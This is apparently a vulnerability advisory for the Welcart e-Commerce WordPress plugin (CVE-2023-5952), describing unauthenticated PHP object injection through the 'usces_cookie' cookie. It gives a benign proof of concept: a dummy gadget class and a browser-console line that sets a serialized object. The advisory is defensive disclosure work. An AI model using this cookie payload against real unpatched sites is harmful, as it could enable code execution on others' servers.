Welcart e-Commerce < 2.9.5 – Unauthenticated PHP Object Injection | CVE 2023-5952 | Plugin Vulnerabilities

Description

The plugin unserializes user input from cookies, which could allow unautehtniacted users to perform PHP Object Injection when a suitable gadget is present on the blog

Proof of Concept

To simulate a gadget chain, put the following code in a plugin:
class Evil {
    public function __wakeup() : void {
        die("Arbitrary deserialization");
    }
}

Then execute the command below in the web developer console of the browser when on the blog as unauthenticated:

document.cookie='usces_cookie=O:4:"Evil":0:{}'

Refresh the page to see the 'Arbitrary deserialization' message displayed

Affects Plugins

Fixed in 2.9.5

References

CVE

Classification

Type

OBJECT INJECTION

OWASP top 10

A8: Insecure Deserialization

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając (CERT PL)

Submitter

Krzysztof Zając (CERT PL)

Submitter website

https://cert.pl

Submitter twitter

Verified

Yes

WPVDB ID

0acd613e-dbd6-42ae-9f3d-6d6e77a4c1b7

Timeline

Publicly Published

2023-11-10 (about 2 years ago)

Added

2023-11-10 (about 2 years ago)

Last Updated

2023-11-10 (about 2 years ago)

Other

Published

Title

Published

2017-04-27

Title

Geo2 Maps Add-on for NextGEN Gallery < 2.0.3 - Unauthenticated PHP Object Injection

Published

2025-04-24

Title

Social Counter < 2.1 - Authenticated (Administrator+) PHP Object Injection

Published

2025-01-03

Title

Backup Migration < 1.4.6.1 - Unauthenticated PHP Object Injection via 'recursive_unserialize_replace'

Published

2025-08-25

Title

Employee Directory – Staff Listing & Team Directory Plugin for WordPress <= 4.5.3 - Unauthenticated PHP Object Injection

Published

2025-07-11

Title

URL Shortener <= 3.0.7 - Unauthenticated PHP Object Injection